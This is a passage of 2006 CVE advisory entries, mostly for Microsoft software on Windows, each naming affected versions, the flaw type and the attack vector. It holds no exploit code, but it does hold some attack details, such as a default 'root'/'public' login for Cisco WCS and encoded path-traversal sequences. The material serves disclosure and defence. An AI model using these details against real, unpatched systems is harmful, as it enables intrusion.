discloses the absolute path of the corresponding TIF folder, aka "TIF Folder Information Disclosure Vulnerability," and a different issue than CVE-2006-5578. [CVE-2006-5574] Unspecified vulnerability in the Brazilian Portuguese Grammar Checker in Microsoft Office 2003 and the Multilingual Interface for Office 2003, Project 2003, and Visio 2003 allows user-assisted remote attackers to execute arbitrary code via crafted text that is not properly parsed. [CVE-2006-5559] The Execute method in the ADODB.Connection 2.7 and 2.8 ActiveX control objects (ADODB.Connection.2.7 and ADODB.Connection.2.8) in the Microsoft Data Access Components (MDAC) 2.5 SP3, 2.7 SP1, 2.8, and 2.8 SP1 does not properly track freed memory when the second argument is a BSTR, which allows remote attackers to cause a denial of service (Internet Explorer crash) and possibly execute arbitrary code via certain strings in the second and third arguments. [CVE-2006-5544] Visual truncation vulnerability in Microsoft Internet Explorer 7 allows remote attackers to spoof the address bar and possibly conduct phishing attacks via a malicious URL containing non-breaking spaces (%A0), which causes the address bar to omit some characters from the URL. [CVE-2006-5395] Buffer overflow in Microsoft Class Package Export Tool (aka clspack.exe) allows context-dependent attackers to execute arbitrary code via a long string. NOTE: the provenance of this information is unknown [CVE-2006-5330] CRLF injection vulnerability in Adobe Flash Player plugin 9.0.16 and earlier for Windows, 7.0.63 and earlier for Linux, 7.x before 7.0 r67 for Solaris, and before 9.0.28.0 for Mac OS X, allows remote attackers to modify HTTP headers of client requests and conduct HTTP Request Splitting attacks via CRLF sequences in arguments to the ActionScript functions (1) XML.addRequestHeader and (2) XML.contentType. NOTE: the flexibility of the attack varies depending on the type of web browser being used. [CVE-2006-5296] PowerPoint in Microsoft Office 2003 does not properly handle a container object whose position value exceeds the record length, which allows user-assisted attackers to cause a denial of service (NULL dereference and application crash) via a crafted PowerPoint (.PPT) file, as demonstrated by Nanika.ppt, and a different vulnerability than CVE-2006-3435, CVE-2006-3876, CVE-2006-3877, and CVE-2006-4694. NOTE: the impact of this issue was originally claimed to be arbitrary code execution, but later analysis demonstrated that this was erroneous. [CVE-2006-5266] Multiple buffer overflows in Microsoft Dynamics GP (formerly Great Plains) 9.0 and earlier allow remote attackers to execute arbitrary code via (1) a crafted Distributed Process Manager (DPM) message to the (a) DPM component, or a (2) long string or (3) long IP address in a Distributed Process Server (DPS) message to the DPM or (b) DPS component. [CVE-2006-5265] Unspecified vulnerability in Microsoft Dynamics GP (formerly Great Plains) 9.0 and earlier allows remote attackers to cause a denial of service (crash) via an invalid magic number in a Distributed Process Server (DPS) message. [CVE-2006-5162] wininet.dll in Microsoft Internet Explorer 6.0 SP2 and earlier allows remote attackers to cause a denial of service (unhandled exception and crash) via a long Content-Type header, which triggers a stack overflow. [CVE-2006-5152] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded URL that is returned in a large HTTP 404 error message without an explicit charset, a related issue to CVE-2006-0032. [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname. [CVE-2006-4981] Symantec Sygate NAC allows physically proximate attackers to bypass control methods and join a local network by selecting a forged MAC address associated with an exception rule that (1) permits all non-Windows devices or (2) whitelists certain sets of Organizationally Unique Identifiers (OUIs). [CVE-2006-4899] The ePPIServlet script in Computer Associates (CA) eTrust Security Command Center 1.0 and r8 up to SP1 CR2, when running on Windows, allows remote attackers to obtain the web server path via a "'" (single quote) in the PIProfile function, which leaks the path in an error message. [CVE-2006-4888] Microsoft Internet Explorer 6 and earlier allows remote attackers to cause a denial of service (application hang) via a CSS-formatted HTML INPUT element within a DIV element that has a larger size than the INPUT. [CVE-2006-4854] REJECT Unspecified vulnerability in Microsoft Office 2000 (Chinese Edition) and Microsoft PowerPoint 2000 (Chinese Edition) allows user-assisted attackers to execute arbitrary code via a crafted PPT document, as exploited by malware such as Trojan.PPDropper.E. NOTE: on 20060919, Microsoft notified CVE that this is a duplicate of CVE-2006-0009. [CVE-2006-4777] Heap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.PathControl) COM object (daxctle.ocx) for Internet Explorer 6.0 SP1, on Chinese and possibly other Windows distributions, allows remote attackers to execute arbitrary code via unknown manipulations in arguments to the KeyFrame method, possibly related to an integer overflow, as demonstrated by daxctle2, and a different vulnerability than CVE-2006-4446. [CVE-2006-4732] Unspecified vulnerability in Microsoft Visual Basic (VB) 6 has an unknown impact ("overflow") via a project that contains a certain Click event procedure, as demonstrated using the msgbox function and the VB.Label object. [CVE-2006-4704] Cross-zone scripting vulnerability in the WMI Object Broker (WMIScriptUtils.WMIObjectBroker2) ActiveX control (WmiScriptUtils.dll) in Microsoft Visual Studio 2005 allows remote attackers to bypass Internet zone restrictions and execute arbitrary code by instantiating dangerous objects, aka "WMI Object Broker Vulnerability." [CVE-2006-4697] Microsoft Internet Explorer 5.01, 6, and 7 uses certain COM objects from Imjpcksid.dll as ActiveX controls, which allows remote attackers to execute arbitrary code via unspecified vectors. NOTE: this issue might be related to CVE-2006-4193. [CVE-2006-4695] Unspecified vulnerability in certain COM objects in Microsoft Office Web Components 2000 allows user-assisted remote attackers to execute arbitrary code via a crafted URL, aka "Office Web Components URL Parsing Vulnerability." [CVE-2006-4693] Unspecified vulnerability in Microsoft Word 2004 for Mac and v.X for Mac allows remote user-assisted attackers to execute arbitrary code via a crafted string in a Word file, a different issue than CVE-2006-3647 and CVE-2006-3651. [CVE-2006-4687] Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via crafted layout combinations involving DIV tags and HTML CSS float properties that trigger memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2006-4686] Buffer overflow in the Extensible Stylesheet Language Transformations (XSLT) processing in Microsoft XML Parser 2.6 and XML Core Services 3.0 through 6.0 allows remote attackers to execute arbitrary code via a crafted Web page. [CVE-2006-4685] The XMLHTTP ActiveX control in Microsoft XML Parser 2.6 and XML Core Services 3.0 through 6.0 does not properly handle HTTP server-side redirects, which allows remote user-assisted attackers to access content from other domains. [CVE-2006-4627] System Information ActiveX control (msinfo.dll), when accessed via Microsoft Internet Explorer, allows remote attackers to cause a denial of service (crash) via a SaveFile function with a long (1) computer and possibly (2) filename and (3) category argument. [CVE-2006-4614] PDAapps Verichat for Pocket PC 1.30bh stores usernames and passwords in plaintext in the Windows Mobile registry, which allows local users to obtain sensitive information via keys under \HKEY_CURRENT_USER\Software\PDAapps\VeriChat. [CVE-2006-4613] Multiple unspecified vulnerabilities in SnapGear before 3.1.4u1 allow remote attackers to cause a denial of service via unspecified vectors involving (1) IPSec replay windows and (2) the use of vulnerable versions of ClamAV before 0.88.4. NOTE: it is possible that vector 2 is related to CVE-2006-4018. [CVE-2006-4560] Internet Explorer 6 on Windows XP SP2 allows remote attackers to execute arbitrary JavaScript in the context of the browser's session with an arbitrary intranet web server, by hosting script on an Internet web server that can be made inaccessible by the attacker and that has a domain name under the attacker's control, which can force the browser to drop DNS pinning and perform a new DNS query for the domain name after the script is already running. [CVE-2006-4534] Unspecified vulnerability in Microsoft Word 2000, 2002, and Office 2003 allows remote user-assisted attackers to execute arbitrary code via unspecified vectors involving a crafted file resulting in a malformed stack, as exploited by malware with names including Trojan.Mdropper.Q, Mofei, and Femo. [CVE-2006-4513] Multiple integer overflows in the WV library in wvWare (formerly mswordview) before 1.2.3, as used by AbiWord, KWord, and possibly other products, allow user-assisted remote attackers to execute arbitrary code via a crafted Microsoft Word (DOC) file that produces (1) large LFO clfolvl values in the wvGetLFO_records function or (2) a large LFO nolfo value in the wvGetFLO_PLF function. [CVE-2006-4494] Microsoft Visual Studio 6.0 allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code by instantiating certain Visual Studio 6.0 ActiveX COM Objects in Internet Explorer, including (1) tcprops.dll, (2) fp30wec.dll, (3) mdt2db.dll, (4) mdt2qd.dll, and (5) vi30aut.dll. [CVE-2006-4492] Unspecified vulnerability in Cybozu Office 6.5 Build 1.2 for Windows allows remote attackers to obtain sensitive information, including users and groups, via unspecified vectors. [CVE-2006-4465] DISPUTED Microsoft Terminal Server, when running an application session with the "Start program at logon" and "Override settings from user profile and Client Connection Manager wizard" options, allows local users to execute arbitrary code by forcing an Explorer error. NOTE: a third-party researcher has stated that the options are "a convenience to users" and were not intended to restrict execution of arbitrary code. [CVE-2006-4446] Heap-based buffer overflow in DirectAnimation.PathControl COM object (daxctle.ocx) in Microsoft Internet Explorer 6.0 SP1 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a Spline function call whose first argument specifies a large number of points. [CVE-2006-4444] Multiple SQL injection vulnerabilities in Cybozu Garoon 2.1.0 for Windows allow remote authenticated users to execute arbitrary SQL commands via the (1) tid parameter in the (a) todo/view (aka TODO List View), (b) todo/modify (aka TODO List Modify), or (c) todo/delete functionality [CVE-2006-4359] Stack-based buffer overflow in Trident Software PowerZip 7.06 Build 3895 on Windows 2000 allows remote attackers to execute arbitrary code via a ZIP archive containing a long filename. [CVE-2006-4332] Unspecified vulnerability in the DHCP dissector in Wireshark (formerly Ethereal) 0.10.13 through 0.99.2, when run on Windows, allows remote attackers to cause a denial of service (crash) via unspecified vectors that trigger a bug in Glib. [CVE-2006-4315] Unquoted Windows search path vulnerability in multiple SSH Tectia products, including Client/Server/Connector 5.0.0 and 5.0.1 and Client/Server before 4.4.5, and Manager 2.12 and earlier, when running on Windows, might allow local users to gain privileges via a malicious program file under "Program Files" or its subdirectories. [CVE-2006-4309] VNC server on the AK-Systems Windows Terminal 1.2.5 ExVLP is not password protected, which allows remote attackers to login and view RDP or Citrix sessions. [CVE-2006-4301] Microsoft Internet Explorer 6.0 SP1 allows remote attackers to cause a denial of service (crash) via a long Color attribute in multiple DirectX Media Image DirectX Transforms ActiveX COM Objects from (a) dxtmsft.dll and (b) dxtmsft3.dll, including (1) DXImageTransform.Microsoft.MaskFilter.1, (2) DXImageTransform.Microsoft.Chroma.1, and (3) DX3DTransform.Microsoft.Shapes.1. [CVE-2006-4274] REJECT Unknown vulnerability in Microsoft PowerPoint allows user-assisted attackers to execute arbitrary code via a crafted PPT document, as exploited by malware such as TROJ_MDROPPER.BH. NOTE: on 20060822, it was determined that TROJ_MDROPPER.BH was exploiting CVE-2006-0009, so this is not a new vulnerability. [CVE-2006-4273] Cross-site scripting (XSS) vulnerability in Jelsoft vBulletin 3.5.4 and 3.6.0 allows remote attackers to inject arbitrary web script or HTML by uploading an attachment with a .pdf extension that contains JavaScript, which is processed as script by Microsoft Internet Explorer 6. [CVE-2006-4258] Absolute path traversal vulnerability in the get functionality in Anti-Spam SMTP Proxy (ASSP) allows remote authenticated users to read arbitrary files via (1) C:\ (Windows drive letter), (2) UNC, and possibly other types of paths in the file parameter. [CVE-2006-4193] Microsoft Internet Explorer 6.0 SP1 and possibly other versions allows remote attackers to cause a denial of service and possibly execute arbitrary code by instantiating COM objects as ActiveX controls, including (1) imskdic.dll (Microsoft IME), (2) chtskdic.dll (Microsoft IME), and (3) msoe.dll (Outlook), which leads to memory corruption. NOTE: it is not certain whether the issue is in Internet Explorer or the individual DLL files. [CVE-2006-4183] Heap-based buffer overflow in Microsoft DirectX SDK (February 2006) and probably earlier, including 9.0c End User Runtimes, allows context-dependent attackers to execute arbitrary code via a crafted Targa file with a run-length-encoding (RLE) compression that produces more data than expected when decoding. [CVE-2006-4128] Multiple heap-based buffer overflows in Symantec VERITAS Backup Exec for Netware Server Remote Agent for Windows Server 9.1 and 9.2 (all builds), Backup Exec Continuous Protection Server Remote Agent for Windows Server 10.1 (builds 10.1.325.6301, 10.1.326.1401, 10.1.326.2501, 10.1.326.3301, and 10.1.327.401), and Backup Exec for Windows Server and Remote Agent 9.1 (build 9.1.4691), 10.0 (builds 10.0.5484 and 10.0.5520), and 10.1 (build 10.1.5629) allow remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted RPC message. [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems. [CVE-2006-4098] Stack-based buffer overflow in the CSRadius service in Cisco Secure Access Control Server (ACS) for Windows before 4.1 and ACS Solution Engine before 4.1 allows remote attackers to execute arbitrary code via a crafted RADIUS Accounting-Request packet. [CVE-2006-4097] Multiple unspecified vulnerabilities in the CSRadius service in Cisco Secure Access Control Server (ACS) for Windows before 4.1 and ACS Solution Engine before 4.1 allow remote attackers to cause a denial of service (crash) via a crafted RADIUS Access-Request packet. NOTE: it has been reported that at least one issue is a heap-based buffer overflow involving the Tunnel-Password attribute. [CVE-2006-4046] Multiple stack-based buffer overflows in Open Cubic Player 2.6.0pre6 and earlier for Windows, and 0.1.10_rc5 and earlier on Linux/BSD, allow remote attackers to execute arbitrary code via (1) a large .S3M file handled by the mpLoadS3M function, (2) a crafted .IT file handled by the itplayerclass::module::load function, (3) a crafted .ULT file handled by the mpLoadULT function, or (4) a crafted .AMS file handled by the mpLoadAMS function. [CVE-2006-3945] The CSS functionality in Opera 9 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by setting the background property of a DHTML element to a long http or https URL, which triggers memory corruption. [CVE-2006-3910] Internet Explorer 6 on Windows XP SP2, when Outlook is installed, allows remote attackers to cause a denial of service (crash) by calling the NewDefaultItem function of an OVCtl (OVCtl.OVCtl.1) ActiveX object, which triggers a null dereference. [CVE-2006-3877] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office 2002, Office 2003, Office 2004 for Mac, and Office v.X for Mac allows user-assisted attackers to execute arbitrary code via an unspecified "crafted file," a different vulnerability than CVE-2006-3435, CVE-2006-4694, and CVE-2006-3876. [CVE-2006-3876] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office 2002, Office 2003, Office 2004 for Mac, and Office v.X for Mac allows user-assisted attackers to execute arbitrary code via a crafted Data record in a PPT file, a different vulnerability than CVE-2006-3435 and CVE-2006-4694. [CVE-2006-3875] Unspecified vulnerability in Microsoft Excel 2000, 2002, 2003, 2004 for Mac, v.X for Mac, and Excel Viewer 2003 allows user-assisted attackers to execute arbitrary code via a crafted COLINFO record in an XLS file, a different vulnerability than CVE-2006-2387 and CVE-2006-3867. [CVE-2006-3868] Unspecified vulnerability in Microsoft Office XP and 2003 allows remote user-assisted attackers to execute arbitrary code via a malformed Smart Tag. [CVE-2006-3867] Unspecified vulnerability in Microsoft Excel 2000, 2002, 2003, 2004 for Mac, v.X for Mac, and Excel Viewer 2003 allows user-assisted attackers to execute arbitrary code via a crafted Lotus 1-2-3 file, a different vulnerability than CVE-2006-2387 and CVE-2006-3875. [CVE-2006-3864] Unspecified vulnerability in mso.dll in Microsoft Office 2000, XP, and 2003, and Microsoft PowerPoint 2000, XP, and 2003, allows remote user-assisted attackers to execute arbitrary code via a malformed record in a (1) .DOC, (2) .PPT, or (3) .XLS file that triggers memory corruption, related to an "array boundary condition" (possibly an array index overflow), a different vulnerability than CVE-2006-3434, CVE-2006-3650, and CVE-2006-3868. [CVE-2006-3854] Buffer overflow in IBM Informix Dynamic Server (IDS) 9.40.TC7, 9.40.TC8, 10.00.TC4, and 10.00.TC5, when running on Windows, allows remote attackers to execute arbitrary code via a long username, which causes an overflow in vsprintf when displaying in the resulting error message. NOTE: this issue is due to an incomplete fix for CVE-2006-3853. [CVE-2006-3853] Buffer overflow in IBM Informix Dynamic Server (IDS) before 9.40.TC7 and 10.00 before 10.00.TC3, when running on Windows, allows remote attackers to execute arbitrary code via a long username. [CVE-2006-3841] Cross-site scripting (XSS) vulnerability in WebScarab before 20060718-1904, when used with Microsoft Internet Explorer 6 SP2 or Konqueror 3.5.3, allows remote attackers to inject arbitrary web script or HTML via the URL, which is not sanitized before being returned in an error message when WebScarab is not able to access the URL. [CVE-2006-3779] Citrix MetaFrame up to XP 1.0 Feature 1, except when running on Windows Server 2003, installs a registry key with an insecure ACL, which allows remote authenticated users to gain privileges. [CVE-2006-3729] DataSourceControl in Internet Explorer 6 on Windows XP SP2 with Office installed allows remote attackers to cause a denial of service (crash) via a large negative integer argument to the getDataMemberName method of a OWC11.DataSourceControl.11 object, which leads to an integer overflow and a null dereference. [CVE-2006-3697] Agnitum Outpost Firewall Pro 3.51.759.6511 (462), as used in (1) Lavasoft Personal Firewall 1.0.543.5722 (433) and (2) Novell BorderManager Novell Client Firewall 2.0, does not properly restrict user activities in application windows that run in a LocalSystem context, which allows local users to gain privileges and execute commands (a) via the "open folder" option when no instance of explorer.exe is running, possibly related to the ShellExecute API function [CVE-2006-3675] Password Safe 2.11, 2.16 and 3.0BETA1 does not respect the configuration settings for locking the password database when certain dialogue windows are open, which might allow attackers with physical access to obtain the database contents. [CVE-2006-3660] Unspecified vulnerability in Microsoft PowerPoint 2003 has unknown impact and user-assisted attack vectors related to powerpnt.exe. NOTE: due to the lack of available details as of 20060717, it is unclear how this is related to CVE-2006-3655, CVE-2006-3656, and CVE-2006-3590, although it is possible that they are all different. [CVE-2006-3659] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by setting the location or URL property of a MHTMLFile ActiveX object. [CVE-2006-3658] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by accessing the object references of a FolderItem ActiveX object, which triggers a null dereference in the security check. [CVE-2006-3657] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (stack overflow exception) via a DXImageTransform.Microsoft.Gradient ActiveX object with a long (1) StartColorStr or (2) EndColorStr property. [CVE-2006-3656] Unspecified vulnerability in Microsoft PowerPoint 2003 allows user-assisted attackers to cause memory corruption via a crafted PowerPoint file, which triggers the corruption when the file is closed. NOTE: due to the lack of available details as of 20060717, it is unclear how this is related to CVE-2006-3655, CVE-2006-3660, and CVE-2006-3590, although it is possible that they are all different. [CVE-2006-3655] Unspecified vulnerability in mso.dll in Microsoft PowerPoint 2003 allows user-assisted attackers to execute arbitrary code via a crafted PowerPoint file. NOTE: due to the lack of available details as of 20060717, it is unclear how this is related to CVE-2006-3656, CVE-2006-3660, and CVE-2006-3590, although it is possible that they are all different. [CVE-2006-3654] Buffer overflow in wksss.exe 8.4.702.0 in Microsoft Works Spreadsheet 8.0 allows remote attackers to cause a denial of service (CPU consumption or crash) via crafted Excel files. [CVE-2006-3653] wksss.exe 8.4.702.0 in Microsoft Works Spreadsheet 8.0 allows remote attackers to cause a denial of service (CPU consumption or crash) via crafted (1) Works, (2) Excel, and (3) Lotus 1-2-3 files. [CVE-2006-3652] Microsoft Internet Security and Acceleration (ISA) Server 2004 allows remote attackers to bypass file extension filters via a request with a trailing "#" character. NOTE: as of 20060715, this could not be reproduced by third parties. [CVE-2006-3651] Unspecified vulnerability in Microsoft Word 2000, 2002, and Office 2003 allows remote user-assisted attackers to execute arbitrary code via a crafted mail merge file, a different vulnerability than CVE-2006-3647 and CVE-2006-4693. [CVE-2006-3650] Microsoft Office 2000, XP, 2003, 2004 for Mac, and v.X for Mac do not properly parse the length of a chart record, which allows remote user-assisted attackers to execute arbitrary code via a Word document with an embedded malformed chart record that triggers an overwrite of pointer values with values from the document, a different vulnerability than CVE-2006-3434, CVE-2006-3864, and CVE-2006-3868. [CVE-2006-3649] Buffer overflow in Microsoft Visual Basic for Applications (VBA) SDK 6.0 through 6.4, as used by Microsoft Office 2000 SP3, Office XP SP3, Project 2000 SR1, Project 2002 SP1, Access 2000 Runtime SP3, Visio 2002 SP2, and Works Suite 2004 through 2006, allows user-assisted attackers to execute arbitrary code via unspecified document properties that are not verified when VBA is invoked to open documents. [CVE-2006-3647] Integer overflow in Microsoft Word 2000, 2002, 2003, 2004 for Mac, and v.X for Mac allows remote user-assisted attackers to execute arbitrary code via a crafted string in a Word document, which overflows a 16-bit integer length value, aka "Memmove Code Execution," a different vulnerability than CVE-2006-3651 and CVE-2006-4693. [CVE-2006-3640] Microsoft Internet Explorer 5.01 and 6 allows certain script to persist across navigations between pages, which allows remote attackers to obtain the window location of visited web pages in other domains or zones, aka "Window Location Information Disclosure Vulnerability." [CVE-2006-3639] Microsoft Internet Explorer 5.01 and 6 does not properly identify the originating domain zone when handling redirects, which allows remote attackers to read cross-domain web pages and possibly execute code via unspecified vectors involving a crafted web page, aka "Source Element Cross-Domain Vulnerability." [CVE-2006-3638] Microsoft Internet Explorer 5.01 and 6 does not properly handle uninitialized COM objects, which allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code, as demonstrated by the Nth function in the DirectAnimation.DATuple ActiveX control, aka "COM Object Instantiation Memory Corruption Vulnerability." [CVE-2006-3637] Microsoft Internet Explorer 5.01 SP4 and 6 does not properly handle various HTML layout component combinations, which allows user-assisted remote attackers to execute arbitrary code via a crafted HTML file that leads to memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2006-3605] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by setting the Transition property on an uninitialized DXImageTransform.Microsoft.RevealTrans.1 ActiveX Object, which triggers a null dereference. [CVE-2006-3601] UNVERIFIABLE Unspecified vulnerability in an unspecified DNN Modules module for DotNetNuke (.net nuke) allows remote attackers to gain privileges via unspecified vectors, as used in an attack against the Microsoft France web site. NOTE: due to the lack of details and uncertainty about which product is affected, this claim is not independently verifiable. [CVE-2006-3591] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (application crash) by accessing the URL property of a TriEditDocument.TriEditDocument object before it has been initialized, which triggers a NULL pointer dereference. [CVE-2006-3590] mso.dll, as used by Microsoft PowerPoint 2000 through 2003, allows user-assisted attackers to execute arbitrary commands via a malformed shape container in a PPT file that leads to memory corruption, as exploited by Trojan.PPDropper.B, a different issue than CVE-2006-1540 and CVE-2006-3493. [CVE-2006-3545] DISPUTED ** Microsoft Internet Explorer 7.0 Beta allows remote attackers to cause a denial of service (application crash) via a web page with multiple empty APPLET start tags. NOTE: a third party has disputed this issue, stating that the crash does not occur with Microsoft Internet Explorer 7.0 Beta3. [CVE-2006-3513] danim.dll in Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (application crash) by accessing the Data property of a DirectAnimation DAUserData object before it is initialized, which triggers a NULL pointer dereference. [CVE-2006-3512] Internet Explorer 6 on Windows XP allows remote attackers to cause a denial of service (crash) by setting the Enabled property of a DXTFilter ActiveX object to true, which triggers a null dereference. [CVE-2006-3511] Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by setting the fonts property of the HtmlDlgSafeHelper object, which triggers a null dereference. [CVE-2006-3493] Buffer overflow in LsCreateLine function (mso_203) in mso.dll and mso9.dll, as used by Microsoft Word and possibly other products in Microsoft Office 2003, 2002, and 2000, allows remote user-assisted attackers to cause a denial of service (crash) via a crafted Word DOC or other Office file type. NOTE: this issue was originally reported to allow code execution, but on 20060710 Microsoft stated that code execution is not possible, and the original researcher agrees. [CVE-2006-3488] Absolute path traversal vulnerability in administrador.asp in VirtuaStore 2.0 allows remote attackers to possibly read arbitrary directories or files via an absolute path with Windows drive letter in the Pasta parameter when link=util, acao=ftp, and acaba=sim. [CVE-2006-3472] Microsoft Internet Explorer 6.0 and 6.0 SP1 allows remote attackers to cause a denial of service via an HTML page with an A tag containing a long title attribute. NOTE: the provenance of this information is unknown [CVE-2006-3451] Microsoft Internet Explorer 5 SP4 and 6 do not properly garbage collect when "multiple imports are used on a styleSheets collection" to construct a chain of Cascading Style Sheets (CSS), which allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2006-3450] Microsoft Internet Explorer 6 allows remote attackers to execute arbitrary code by using the document.getElementByID Javascript function to access crafted Cascading Style Sheet (CSS) elements, and possibly other unspecified vectors involving certain layout positioning combinations in an HTML file. [CVE-2006-3449] Unspecified vulnerability in Microsoft PowerPoint 2000 through 2003, possibly a buffer overflow, allows user-assisted remote attackers to execute arbitrary commands via a malformed record in the BIFF file format used in a PPT file, a different issue than CVE-2006-1540, aka "Microsoft PowerPoint Malformed Record Vulnerability." [CVE-2006-3438] Unspecified vulnerability in Microsoft Hyperlink Object Library (hlink.dll), possibly a buffer overflow, allows user-assisted attackers to execute arbitrary code via crafted hyperlinks that are not properly handled when hlink.dll "uses a file containing a malformed function," aka "Hyperlink Object Function Vulnerability." [CVE-2006-3436] Cross-site scripting (XSS) vulnerability in Microsoft .NET Framework 2.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving "ASP.NET controls that set the AutoPostBack property to true". [CVE-2006-3435] PowerPoint in Microsoft Office 2000, XP, 2003, 2004 for Mac, and v.X for Mac does not properly parse the slide notes field in a document, which allows remote user-assisted attackers to execute arbitrary code via crafted data in this field, which triggers an erroneous object pointer calculation that uses data from within the document. NOTE: this issue is different than other PowerPoint vulnerabilities including CVE-2006-4694. [CVE-2006-3434] Unspecified vulnerability in Microsoft Office 2000, XP, 2003, 2004 for Mac, and v.X for Mac allows remote user-assisted attackers to execute arbitrary code via a crafted string that triggers memory corruption. [CVE-2006-3431] Buffer overflow in certain Asian language versions of Microsoft Excel might allow user-assisted attackers to execute arbitrary code via a crafted STYLE record in a spreadsheet that triggers the overflow when the user attempts to repair the document or selects the "Style" option, as demonstrated by nanika.xls. NOTE: Microsoft has confirmed to CVE via e-mail that this is different than the other Excel vulnerabilities announced before 20060707, including CVE-2006-3059 and CVE-2006-3086. [CVE-2006-3427] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by declaring the sourceURL attribute on an uninitialized DirectAnimation.StructuredGraphicsControl ActiveX Object, which triggers a null dereference. [CVE-2006-3357] Heap-based buffer overflow in HTML Help ActiveX control (hhctrl.ocx) in Microsoft Internet Explorer 6.0 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code by repeatedly setting the Image field of an Internet.HHCtrl.1 object to certain values, possibly related to improper escaping and long strings. [CVE-2006-3354] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by setting the Filter property of an ADODB.Recordset ActiveX object to certain values multiple times, which triggers a null dereference. [CVE-2006-3351] Buffer overflow in Windows Explorer (explorer.exe) on Windows XP and 2003 allows user-assisted attackers to cause a denial of service (repeated crash) and possibly execute arbitrary code via a .url file with an InternetShortcut tag containing a long URL and a large number of "file:" specifiers. [CVE-2006-3290] HTTP server in Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51) stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain usernames and directory paths via a direct URL request. [CVE-2006-3289] Cross-site scripting (XSS) vulnerability in the login page of the HTTP interface for the Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving a "malicious URL". [CVE-2006-3288] Unspecified vulnerability in the TFTP server in Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51), when configured to use a directory path name that contains a space character, allows remote authenticated users to read and overwrite arbitrary files via unspecified vectors. [CVE-2006-3287] Cisco Wireless Control System (WCS) for Linux and Windows 4.0(1) and earlier uses a default administrator username "root" and password "public," which allows remote attackers to gain access (aka bug CSCse21391). [CVE-2006-3286] The internal database in Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(63) stores a hard-coded username and password in plaintext within unspecified files, which allows remote authenticated users to access the database (aka bug CSCsd15951). [CVE-2006-3285] The internal database in Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51) uses an undocumented, hard-coded username and password, which allows remote authenticated users to read, and possibly modify, sensitive configuration data (aka bugs CSCsd15955). [CVE-2006-3281] Microsoft Internet Explorer 6.0 does not properly handle Drag and Drop events, which allows remote user-assisted attackers to execute arbitrary code via a link to an SMB file share with a filename that contains encoded ..\ (%2e%2e%5c) sequences and whose extension contains the CLSID Key identifier for HTML Applications (HTA), aka "Folder GUID Code Execution Vulnerability." NOTE: directory traversal sequences were used in the original exploit, although their role is not clear. [CVE-2006-3280] Cross-domain vulnerability in Microsoft Internet Explorer 6.0 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, aka "Redirect Cross-Domain Information Disclosure Vulnerability." [CVE-2006-3274] Directory traversal vulnerability in Webmin before 1.280, when run on Windows, allows remote attackers to read arbitrary files via \ (backslash) characters in the URL to certain directories under the web root, such as the image directory. [CVE-2006-3268] Unspecified vulnerability in the Windows Client API in Novell GroupWise 5.x through 7 might allow users to obtain "random programmatic access" to other email within the same post office. [CVE-2006-3250] Heap-based buffer overflow in Windows Live Messenger 8.0 allows user-assisted attackers to execute arbitrary code via a crafted Contact List (.ctt) file, which triggers the overflow when it is imported by the user. [CVE-2006-3226] Cisco Secure Access Control Server (ACS) 4.x for Windows uses the client's IP address and the server's port number to grant access to an HTTP server port for an administration session, which allows remote attackers to bypass authentication via various methods, aka "ACS Weak Session Management Vulnerability." [CVE-2006-3146] The TOSRFBD.SYS driver for Toshiba Bluetooth Stack 4.00.29 and earlier on Windows allows remote attackers to cause a denial of service (reboot) via a L2CAP echo request that triggers an out-of-bounds memory access, similar to "Ping o' Death" and as demonstrated by BlueSmack. NOTE: this issue was originally reported for 4.00.23. [CVE-2006-3086] Stack-based buffer overflow in the HrShellOpenWithMonikerDisplayName function in Microsoft Hyperlink Object Library (hlink.dll) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long hyperlink, as demonstrated using an Excel worksheet with a long link in Unicode, aka "Hyperlink COM Object Buffer Overflow Vulnerability." NOTE: this is a different issue than CVE-2006-3059. [CVE-2006-3074] klif.sys in Kaspersky Internet Security 6.0 and 7.0, Kaspersky Anti-Virus (KAV) 6.0 and 7.0, KAV 6.0 for Windows Workstations, and KAV 6.0 for Windows Servers does not validate certain parameters to the (1) NtCreateKey, (2) 